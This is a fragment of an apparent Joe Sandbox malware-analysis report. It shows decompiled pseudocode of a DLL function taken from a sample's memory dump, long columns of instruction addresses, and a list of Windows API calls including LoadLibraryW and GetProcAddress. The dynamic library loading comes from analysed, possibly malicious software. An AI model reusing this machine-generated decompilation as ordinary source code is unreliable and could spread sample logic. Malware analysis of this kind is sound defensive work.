                                                                                      									goto L57;
                                                                                      								}
                                                                                      								_t316 = _t315 - 0x11;
                                                                                      								__eflags = _t316;
                                                                                      								if(_t316 == 0) {
                                                                                      									_t274 = 0x100;
                                                                                      									goto L75;
                                                                                      								}
                                                                                      								_t317 = _t316 - 0x31;
                                                                                      								__eflags = _t317;
                                                                                      								if(_t317 == 0) {
                                                                                      									_t274 = 1;
                                                                                      									goto L75;
                                                                                      								}
                                                                                      								__eflags = _t317 != 0;
                                                                                      								if(_t317 != 0) {
                                                                                      									goto L57;
                                                                                      								}
                                                                                      								_push(0x20);
                                                                                      								goto L74;
                                                                                      							} else {
                                                                                      								_v32 = _t283;
                                                                                      								_v36 = _t283;
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						}
                                                                                      						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                                                      						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                                                      							goto L17;
                                                                                      						}
                                                                                      						__eflags = _v32 - _t283;
                                                                                      						if(_v32 == _t283) {
                                                                                      							goto L43;
                                                                                      						}
                                                                                      						goto L17;
                                                                                      					}
                                                                                      					_t277 = _t258 - 5;
                                                                                      					if(_t277 == 0) {
                                                                                      						__eflags = _v44 - _t283;
                                                                                      						if(_v44 != _t283) {
                                                                                      							goto L43;
                                                                                      						} else {
                                                                                      							__eflags = _v36 - 3;
                                                                                      							_v32 = 1;
                                                                                      							_v8 = _t283;
                                                                                      							_v20 = _t283;
                                                                                      							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                      							_v40 = _t283;
                                                                                      							goto L20;
                                                                                      						}
                                                                                      					}
                                                                                      					_t281 = _t277 - 1;
                                                                                      					if(_t281 == 0) {
                                                                                      						__eflags = _v44 - _t283;
                                                                                      						if(_v44 != _t283) {
                                                                                      							goto L43;
                                                                                      						} else {
                                                                                      							_v32 = 2;
                                                                                      							_v8 = _t283;
                                                                                      							_v20 = _t283;
                                                                                      							goto L20;
                                                                                      						}
                                                                                      					}
                                                                                      					if(_t281 != 0x16) {
                                                                                      						goto L43;
                                                                                      					} else {
                                                                                      						_v32 = 3;
                                                                                      						_v8 = 1;
                                                                                      						goto L20;
                                                                                      					}
                                                                                      				}
                                                                                      				GlobalFree(_v56);
                                                                                      				GlobalFree(_v24);
                                                                                      				GlobalFree(_v48);
                                                                                      				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                                                      					L182:
                                                                                      					return _t332;
                                                                                      				} else {
                                                                                      					_t225 =  *_t332 - 1;
                                                                                      					if(_t225 == 0) {
                                                                                      						_t187 = _t332 + 8; // 0x8
                                                                                      						_t324 = _t187;
                                                                                      						__eflags =  *_t324 - _t283;
                                                                                      						if( *_t324 != _t283) {
                                                                                      							_t226 = GetModuleHandleW(_t324);
                                                                                      							__eflags = _t226 - _t283;
                                                                                      							 *(_t332 + 0x1008) = _t226;
                                                                                      							if(_t226 != _t283) {
                                                                                      								L171:
                                                                                      								_t192 = _t332 + 0x808; // 0x808
                                                                                      								_t325 = _t192;
                                                                                      								_t227 = E6F49161D( *(_t332 + 0x1008), _t325);
                                                                                      								__eflags = _t227 - _t283;
                                                                                      								 *(_t332 + 0x100c) = _t227;
                                                                                      								if(_t227 == _t283) {
                                                                                      									__eflags =  *_t325 - 0x23;
                                                                                      									if( *_t325 == 0x23) {
                                                                                      										_t195 = _t332 + 0x80a; // 0x80a
                                                                                      										_t231 = E6F491311(_t195);
                                                                                      										__eflags = _t231 - _t283;
                                                                                      										if(_t231 != _t283) {
                                                                                      											__eflags = _t231 & 0xffff0000;
                                                                                      											if((_t231 & 0xffff0000) == 0) {
                                                                                      												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								__eflags = _v52 - _t283;
                                                                                      								if(_v52 != _t283) {
                                                                                      									L178:
                                                                                      									_t325[lstrlenW(_t325)] = 0x57;
                                                                                      									_t229 = E6F49161D( *(_t332 + 0x1008), _t325);
                                                                                      									__eflags = _t229 - _t283;
                                                                                      									if(_t229 != _t283) {
                                                                                      										L166:
                                                                                      										 *(_t332 + 0x100c) = _t229;
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                      									L180:
                                                                                      									if(__eflags != 0) {
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									L181:
                                                                                      									_t206 = _t332 + 4;
                                                                                      									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                                                      									__eflags =  *_t206;
                                                                                      									goto L182;
                                                                                      								} else {
                                                                                      									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                      									if( *(_t332 + 0x100c) != _t283) {
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									goto L178;
                                                                                      								}
                                                                                      							}
                                                                                      							_t234 = LoadLibraryW(_t324);
                                                                                      							__eflags = _t234 - _t283;
                                                                                      							 *(_t332 + 0x1008) = _t234;
                                                                                      							if(_t234 == _t283) {
                                                                                      								goto L181;
                                                                                      							}
                                                                                      							goto L171;
                                                                                      						}
                                                                                      						_t188 = _t332 + 0x808; // 0x808
                                                                                      						_t236 = E6F491311(_t188);
                                                                                      						 *(_t332 + 0x100c) = _t236;
                                                                                      						__eflags = _t236 - _t283;
                                                                                      						goto L180;
                                                                                      					}
                                                                                      					_t237 = _t225 - 1;
                                                                                      					if(_t237 == 0) {
                                                                                      						_t185 = _t332 + 0x808; // 0x808
                                                                                      						_t238 = _t185;
                                                                                      						__eflags =  *_t238 - _t283;
                                                                                      						if( *_t238 == _t283) {
                                                                                      							goto L182;
                                                                                      						}
                                                                                      						_t229 = E6F491311(_t238);
                                                                                      						L165:
                                                                                      						goto L166;
                                                                                      					}
                                                                                      					if(_t237 != 1) {
                                                                                      						goto L182;
                                                                                      					}
                                                                                      					_t81 = _t332 + 8; // 0x8
                                                                                      					_t284 = _t81;
                                                                                      					_t326 = E6F491311(_t81);
                                                                                      					 *(_t332 + 0x1008) = _t326;
                                                                                      					if(_t326 == 0) {
                                                                                      						goto L181;
                                                                                      					}
                                                                                      					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1050)) = E6F49122C(_t284);
                                                                                      					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                                                      					_t90 = _t332 + 0x808; // 0x808
                                                                                      					_t229 =  *(_t326->i + E6F491311(_t90) * 4);
                                                                                      					goto L165;
                                                                                      				}
                                                                                      			}

































































                                                                                      0x6f491b67
                                                                                      0x6f491b6a
                                                                                      0x6f491b6d
                                                                                      0x6f491b70
                                                                                      0x6f491b73
                                                                                      0x6f491b76
                                                                                      0x6f491b79
                                                                                      0x6f491b7b
                                                                                      0x6f491b7e
                                                                                      0x6f491b81
                                                                                      0x6f491b86
                                                                                      0x6f491b89
                                                                                      0x6f491b91
                                                                                      0x6f491b99
                                                                                      0x6f491b9b
                                                                                      0x6f491b9e
                                                                                      0x6f491ba6
                                                                                      0x6f491ba6
                                                                                      0x6f491bab
                                                                                      0x6f491bae
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491bbb
                                                                                      0x6f491bc0
                                                                                      0x6f491bc2
                                                                                      0x6f491c54
                                                                                      0x6f491c54
                                                                                      0x6f491c54
                                                                                      0x6f491c58
                                                                                      0x6f491c5b
                                                                                      0x6f491c5d
                                                                                      0x6f491c7f
                                                                                      0x6f491c81
                                                                                      0x6f491c84
                                                                                      0x6f491c93
                                                                                      0x6f491c95
                                                                                      0x6f491c9b
                                                                                      0x6f491c9b
                                                                                      0x6f491ca1
                                                                                      0x6f491ca4
                                                                                      0x6f491ca4
                                                                                      0x6f491ca7
                                                                                      0x6f491ca7
                                                                                      0x6f491cad
                                                                                      0x6f491caf
                                                                                      0x6f491caf
                                                                                      0x6f491cb1
                                                                                      0x6f491cb4
                                                                                      0x6f491cb7
                                                                                      0x6f491cbd
                                                                                      0x6f491cc3
                                                                                      0x6f491cc6
                                                                                      0x6f491cea
                                                                                      0x6f491ced
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491cf0
                                                                                      0x6f491cf2
                                                                                      0x6f491d00
                                                                                      0x6f491d03
                                                                                      0x6f491d05
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491d07
                                                                                      0x6f491d07
                                                                                      0x6f491d07
                                                                                      0x6f491d0d
                                                                                      0x6f491d0f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491d11
                                                                                      0x6f491d13
                                                                                      0x6f491d15
                                                                                      0x6f491d17
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491d17
                                                                                      0x6f491d19
                                                                                      0x6f491d1b
                                                                                      0x6f491d1d
                                                                                      0x6f491d1d
                                                                                      0x6f491d23
                                                                                      0x6f491d29
                                                                                      0x6f491d2b
                                                                                      0x6f491d3f
                                                                                      0x6f491d3f
                                                                                      0x6f491d41
                                                                                      0x6f491d2d
                                                                                      0x6f491d33
                                                                                      0x6f491d36
                                                                                      0x6f491d36
                                                                                      0x00000000
                                                                                      0x6f491cc8
                                                                                      0x6f491cc8
                                                                                      0x6f491cc8
                                                                                      0x6f491cc9
                                                                                      0x6f491cd1
                                                                                      0x6f491cd5
                                                                                      0x6f491cdb
                                                                                      0x6f491cdf
                                                                                      0x00000000
                                                                                      0x6f491cdf
                                                                                      0x6f491ccb
                                                                                      0x6f491ccb
                                                                                      0x6f491ccc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491cce
                                                                                      0x6f491ccf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491ccf
                                                                                      0x6f491c5f
                                                                                      0x6f491c60
                                                                                      0x6f491c69
                                                                                      0x6f491c6c
                                                                                      0x6f491c79
                                                                                      0x6f491c79
                                                                                      0x6f491c6e
                                                                                      0x6f491c6e
                                                                                      0x6f491d47
                                                                                      0x6f491d4a
                                                                                      0x6f491d4e
                                                                                      0x6f491dc1
                                                                                      0x6f491dc5
                                                                                      0x6f491ba3
                                                                                      0x00000000
                                                                                      0x6f491ba3
                                                                                      0x00000000
                                                                                      0x6f491dc5
                                                                                      0x6f491c5d
                                                                                      0x6f491bc8
                                                                                      0x6f491bcb
                                                                                      0x6f491c2e
                                                                                      0x6f491c31
                                                                                      0x6f491c43
                                                                                      0x6f491c43
                                                                                      0x6f491c46
                                                                                      0x6f491d53
                                                                                      0x6f491d56
                                                                                      0x6f491d56
                                                                                      0x6f491d58
                                                                                      0x6f49210e
                                                                                      0x6f492126
                                                                                      0x6f492126
                                                                                      0x6f492129
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492113
                                                                                      0x6f492114
                                                                                      0x6f492117
                                                                                      0x6f49211a
                                                                                      0x6f4921a4
                                                                                      0x6f4921ab
                                                                                      0x6f4921b1
                                                                                      0x6f4921b5
                                                                                      0x6f491dbc
                                                                                      0x6f491dbd
                                                                                      0x6f491dbd
                                                                                      0x6f491dbe
                                                                                      0x00000000
                                                                                      0x6f491dbe
                                                                                      0x6f492120
                                                                                      0x6f492123
                                                                                      0x6f492123
                                                                                      0x6f49212b
                                                                                      0x6f49212e
                                                                                      0x6f492198
                                                                                      0x6f491db1
                                                                                      0x6f491db4
                                                                                      0x6f491db7
                                                                                      0x6f491dba
                                                                                      0x6f491dba
                                                                                      0x00000000
                                                                                      0x6f491dba
                                                                                      0x6f492130
                                                                                      0x6f492133
                                                                                      0x6f49213a
                                                                                      0x6f49213a
                                                                                      0x6f49213d
                                                                                      0x6f492141
                                                                                      0x6f492155
                                                                                      0x6f492155
                                                                                      0x6f492158
                                                                                      0x6f49215c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49215e
                                                                                      0x6f492162
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492164
                                                                                      0x6f49216b
                                                                                      0x6f49216b
                                                                                      0x6f492171
                                                                                      0x6f492174
                                                                                      0x6f492190
                                                                                      0x6f492176
                                                                                      0x6f49217f
                                                                                      0x6f492182
                                                                                      0x6f492182
                                                                                      0x00000000
                                                                                      0x6f492174
                                                                                      0x6f492143
                                                                                      0x6f492146
                                                                                      0x6f49214a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49214c
                                                                                      0x00000000
                                                                                      0x6f49214c
                                                                                      0x6f492135
                                                                                      0x6f492138
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492138
                                                                                      0x6f491d5e
                                                                                      0x6f491d5e
                                                                                      0x6f491d5f
                                                                                      0x6f491ea9
                                                                                      0x6f491ea9
                                                                                      0x6f491eb0
                                                                                      0x6f491eb3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491ec0
                                                                                      0x00000000
                                                                                      0x6f4920ab
                                                                                      0x6f4920ae
                                                                                      0x6f4920b1
                                                                                      0x6f4920b1
                                                                                      0x6f4920b2
                                                                                      0x6f4920b3
                                                                                      0x6f4920b6
                                                                                      0x6f4920b9
                                                                                      0x6f4920bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4920be
                                                                                      0x6f4920be
                                                                                      0x6f4920c2
                                                                                      0x6f4920da
                                                                                      0x6f4920dd
                                                                                      0x6f4920e1
                                                                                      0x6f4920e7
                                                                                      0x00000000
                                                                                      0x6f4920e7
                                                                                      0x6f4920c4
                                                                                      0x6f4920c4
                                                                                      0x6f4920c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4920c9
                                                                                      0x6f4920cc
                                                                                      0x6f4920ce
                                                                                      0x6f4920cf
                                                                                      0x6f4920cf
                                                                                      0x6f4920cf
                                                                                      0x6f4920d0
                                                                                      0x6f4920d3
                                                                                      0x6f4920d6
                                                                                      0x6f4920d7
                                                                                      0x6f4920b1
                                                                                      0x6f4920b2
                                                                                      0x6f4920b3
                                                                                      0x6f4920b6
                                                                                      0x6f4920b9
                                                                                      0x6f4920bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4920bc
                                                                                      0x00000000
                                                                                      0x6f491f07
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491f13
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491efa
                                                                                      0x6f491efe
                                                                                      0x6f491f02
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49207c
                                                                                      0x6f492080
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492086
                                                                                      0x6f49208f
                                                                                      0x6f492096
                                                                                      0x6f49209e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491fe3
                                                                                      0x6f491fe3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491f1c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492106
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491feb
                                                                                      0x6f491fed
                                                                                      0x6f491fed
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4920f6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4920fa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492102
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492033
                                                                                      0x6f492035
                                                                                      0x6f492035
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491ffd
                                                                                      0x6f491fff
                                                                                      0x6f491fff
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49200f
                                                                                      0x6f492011
                                                                                      0x6f492011
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492041
                                                                                      0x6f492043
                                                                                      0x6f492043
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49201a
                                                                                      0x6f49201c
                                                                                      0x6f49201c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492021
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4920fe
                                                                                      0x6f492108
                                                                                      0x6f492108
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49204c
                                                                                      0x6f492050
                                                                                      0x6f492055
                                                                                      0x6f492058
                                                                                      0x6f492059
                                                                                      0x6f49205c
                                                                                      0x6f492062
                                                                                      0x6f492062
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4920ee
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492025
                                                                                      0x6f492027
                                                                                      0x6f492027
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491f23
                                                                                      0x6f491f23
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49203a
                                                                                      0x6f49203c
                                                                                      0x6f49203c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491ec7
                                                                                      0x6f491ecd
                                                                                      0x6f491ed0
                                                                                      0x6f491ed2
                                                                                      0x6f491ed2
                                                                                      0x6f491ed5
                                                                                      0x6f491ed9
                                                                                      0x6f491ee6
                                                                                      0x6f491ee8
                                                                                      0x6f491eee
                                                                                      0x6f491eee
                                                                                      0x6f491eee
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491fee
                                                                                      0x6f491fee
                                                                                      0x6f491ff0
                                                                                      0x6f491ff7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492036
                                                                                      0x6f492036
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492000
                                                                                      0x6f492000
                                                                                      0x6f492002
                                                                                      0x6f492009
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492012
                                                                                      0x6f492012
                                                                                      0x6f492014
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492044
                                                                                      0x6f492044
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49201d
                                                                                      0x6f49201d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49206a
                                                                                      0x6f49206e
                                                                                      0x6f492073
                                                                                      0x6f492076
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492028
                                                                                      0x6f492028
                                                                                      0x6f49202b
                                                                                      0x6f49202d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f49203d
                                                                                      0x6f49203d
                                                                                      0x6f492046
                                                                                      0x6f492046
                                                                                      0x6f491f25
                                                                                      0x6f491f25
                                                                                      0x6f491f28
                                                                                      0x6f491f2f
                                                                                      0x6f491f31
                                                                                      0x6f491f33
                                                                                      0x6f491f3a
                                                                                      0x6f491f3d
                                                                                      0x6f491f42
                                                                                      0x6f491f44
                                                                                      0x6f491f46
                                                                                      0x6f491f4a
                                                                                      0x6f491f50
                                                                                      0x6f491f56
                                                                                      0x6f491f56
                                                                                      0x6f491f58
                                                                                      0x6f491f58
                                                                                      0x6f491f59
                                                                                      0x6f491f59
                                                                                      0x6f491f5d
                                                                                      0x6f491f63
                                                                                      0x6f491f65
                                                                                      0x6f491f69
                                                                                      0x6f491f6e
                                                                                      0x6f491f6e
                                                                                      0x6f491f70
                                                                                      0x6f491f70
                                                                                      0x6f491f73
                                                                                      0x6f491f76
                                                                                      0x6f491f7f
                                                                                      0x6f491f85
                                                                                      0x6f491f88
                                                                                      0x6f491f88
                                                                                      0x6f491f8a
                                                                                      0x6f491f8d
                                                                                      0x6f491f93
                                                                                      0x6f491f99
                                                                                      0x6f491f99
                                                                                      0x6f491f9b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491fa1
                                                                                      0x6f491fa1
                                                                                      0x6f491fa5
                                                                                      0x6f491fac
                                                                                      0x6f491fd0
                                                                                      0x6f491fd0
                                                                                      0x6f491fd4
                                                                                      0x6f491fd6
                                                                                      0x6f491fd9
                                                                                      0x6f491fd9
                                                                                      0x6f491fdc
                                                                                      0x6f491fdc
                                                                                      0x00000000
                                                                                      0x6f491fd4
                                                                                      0x6f491fb1
                                                                                      0x6f491fb4
                                                                                      0x6f491fb4
                                                                                      0x6f491fbb
                                                                                      0x6f491fbd
                                                                                      0x6f491fc0
                                                                                      0x6f491fc7
                                                                                      0x6f491fc8
                                                                                      0x6f491fce
                                                                                      0x6f491fce
                                                                                      0x00000000
                                                                                      0x6f491fce
                                                                                      0x6f491fc2
                                                                                      0x6f491fc5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491fc5
                                                                                      0x6f491f52
                                                                                      0x6f491f54
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491ec0
                                                                                      0x6f491d65
                                                                                      0x6f491d65
                                                                                      0x6f491d66
                                                                                      0x6f491ea6
                                                                                      0x00000000
                                                                                      0x6f491ea6
                                                                                      0x6f491d6c
                                                                                      0x6f491d6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491d73
                                                                                      0x6f491d76
                                                                                      0x6f491e6b
                                                                                      0x6f491e6b
                                                                                      0x6f491e6e
                                                                                      0x6f491e83
                                                                                      0x6f491e85
                                                                                      0x6f491e85
                                                                                      0x6f491e86
                                                                                      0x6f491e89
                                                                                      0x6f491e8c
                                                                                      0x6f491e98
                                                                                      0x6f491e98
                                                                                      0x6f491e98
                                                                                      0x6f491e8e
                                                                                      0x6f491e8e
                                                                                      0x6f491e8e
                                                                                      0x6f491e9e
                                                                                      0x00000000
                                                                                      0x6f491e9e
                                                                                      0x6f491e70
                                                                                      0x6f491e70
                                                                                      0x6f491e71
                                                                                      0x6f491e7f
                                                                                      0x00000000
                                                                                      0x6f491e7f
                                                                                      0x6f491e74
                                                                                      0x6f491e75
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491e7b
                                                                                      0x00000000
                                                                                      0x6f491e7b
                                                                                      0x6f491d7c
                                                                                      0x6f491e67
                                                                                      0x00000000
                                                                                      0x6f491e67
                                                                                      0x6f491d82
                                                                                      0x6f491d82
                                                                                      0x6f491d85
                                                                                      0x6f491dae
                                                                                      0x00000000
                                                                                      0x6f491dae
                                                                                      0x6f491d87
                                                                                      0x6f491d87
                                                                                      0x6f491d8a
                                                                                      0x6f491da4
                                                                                      0x00000000
                                                                                      0x6f491da4
                                                                                      0x6f491d8c
                                                                                      0x6f491d8c
                                                                                      0x6f491d8f
                                                                                      0x6f491d9e
                                                                                      0x00000000
                                                                                      0x6f491d9e
                                                                                      0x6f491d92
                                                                                      0x6f491d93
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491d95
                                                                                      0x00000000
                                                                                      0x6f491c4c
                                                                                      0x6f491c4c
                                                                                      0x6f491c4f
                                                                                      0x00000000
                                                                                      0x6f491c4f
                                                                                      0x6f491c46
                                                                                      0x6f491c33
                                                                                      0x6f491c38
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491c3a
                                                                                      0x6f491c3d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491c3d
                                                                                      0x6f491bcd
                                                                                      0x6f491bd0
                                                                                      0x6f491c06
                                                                                      0x6f491c09
                                                                                      0x00000000
                                                                                      0x6f491c0f
                                                                                      0x6f491c11
                                                                                      0x6f491c15
                                                                                      0x6f491c1c
                                                                                      0x6f491c23
                                                                                      0x6f491c26
                                                                                      0x6f491c29
                                                                                      0x00000000
                                                                                      0x6f491c29
                                                                                      0x6f491c09
                                                                                      0x6f491bd2
                                                                                      0x6f491bd3
                                                                                      0x6f491bee
                                                                                      0x6f491bf1
                                                                                      0x00000000
                                                                                      0x6f491bf7
                                                                                      0x6f491bf7
                                                                                      0x6f491bfe
                                                                                      0x6f491c01
                                                                                      0x00000000
                                                                                      0x6f491c01
                                                                                      0x6f491bf1
                                                                                      0x6f491bd8
                                                                                      0x00000000
                                                                                      0x6f491bde
                                                                                      0x6f491bde
                                                                                      0x6f491be5
                                                                                      0x00000000
                                                                                      0x6f491be5
                                                                                      0x6f491bd8
                                                                                      0x6f491dd4
                                                                                      0x6f491dd9
                                                                                      0x6f491dde
                                                                                      0x6f491de2
                                                                                      0x6f4922b5
                                                                                      0x6f4922bb
                                                                                      0x6f491df4
                                                                                      0x6f491df6
                                                                                      0x6f491df7
                                                                                      0x6f4921de
                                                                                      0x6f4921de
                                                                                      0x6f4921e1
                                                                                      0x6f4921e4
                                                                                      0x6f492201
                                                                                      0x6f492207
                                                                                      0x6f492209
                                                                                      0x6f49220f
                                                                                      0x6f492226
                                                                                      0x6f492226
                                                                                      0x6f492226
                                                                                      0x6f492233
                                                                                      0x6f492239
                                                                                      0x6f49223c
                                                                                      0x6f492242
                                                                                      0x6f492244
                                                                                      0x6f492248
                                                                                      0x6f49224a
                                                                                      0x6f492251
                                                                                      0x6f492256
                                                                                      0x6f492259
                                                                                      0x6f49225b
                                                                                      0x6f492260
                                                                                      0x6f492272
                                                                                      0x6f492272
                                                                                      0x6f492260
                                                                                      0x6f492259
                                                                                      0x6f492248
                                                                                      0x6f492278
                                                                                      0x6f49227b
                                                                                      0x6f492285
                                                                                      0x6f49228d
                                                                                      0x6f49229a
                                                                                      0x6f4922a0
                                                                                      0x6f4922a3
                                                                                      0x6f4921d3
                                                                                      0x6f4921d3
                                                                                      0x00000000
                                                                                      0x6f4921d3
                                                                                      0x6f4922a9
                                                                                      0x6f4922af
                                                                                      0x6f4922af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4922b1
                                                                                      0x6f4922b1
                                                                                      0x6f4922b1
                                                                                      0x6f4922b1
                                                                                      0x00000000
                                                                                      0x6f49227d
                                                                                      0x6f49227d
                                                                                      0x6f492283
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492283
                                                                                      0x6f49227b
                                                                                      0x6f492212
                                                                                      0x6f492218
                                                                                      0x6f49221a
                                                                                      0x6f492220
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f492220
                                                                                      0x6f4921e6
                                                                                      0x6f4921ed
                                                                                      0x6f4921f3
                                                                                      0x6f4921f9
                                                                                      0x00000000
                                                                                      0x6f4921f9
                                                                                      0x6f491dfd
                                                                                      0x6f491dfe
                                                                                      0x6f4921bd
                                                                                      0x6f4921bd
                                                                                      0x6f4921c3
                                                                                      0x6f4921c6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f4921cd
                                                                                      0x6f4921d2
                                                                                      0x00000000
                                                                                      0x6f4921d2
                                                                                      0x6f491e05
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491e0b
                                                                                      0x6f491e0b
                                                                                      0x6f491e14
                                                                                      0x6f491e19
                                                                                      0x6f491e1f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x6f491e25
                                                                                      0x6f491e32
                                                                                      0x6f491e38
                                                                                      0x6f491e42
                                                                                      0x6f491e48
                                                                                      0x6f491e50
                                                                                      0x6f491e60
                                                                                      0x00000000
                                                                                      0x6f491e60

                                                                                      APIs
                                                                                        • Part of subcall function 6F49121B: GlobalAlloc.KERNEL32(00000040,?,6F49123B,?,6F4912DF,00000019,6F4911BE,-000000A0), ref: 6F491225
                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6F491C8D
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 6F491CD5
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 6F491CDF
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F491CF2
                                                                                      • GlobalFree.KERNEL32(?), ref: 6F491DD4
                                                                                      • GlobalFree.KERNEL32(?), ref: 6F491DD9
                                                                                      • GlobalFree.KERNEL32(?), ref: 6F491DDE
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F491FC8
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 6F492182
                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 6F492201
                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 6F492212
                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 6F49226C
                                                                                      • lstrlenW.KERNEL32(00000808), ref: 6F492286
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1343531538.000000006F491000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F490000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1343473966.000000006F490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343609504.000000006F494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343646469.000000006F496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6f490000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 245916457-0
                                                                                      • Opcode ID: ccd56d5c9e63b5f440eb6e5c39e43c389e32cec19cc9bdc0c7928c765954d212
                                                                                      • Instruction ID: c8681eb1ba6651445670485396d9830aac40dd0c2cbe3d6a7102e4e1c2b77208
                                                                                      • Opcode Fuzzy Hash: ccd56d5c9e63b5f440eb6e5c39e43c389e32cec19cc9bdc0c7928c765954d212
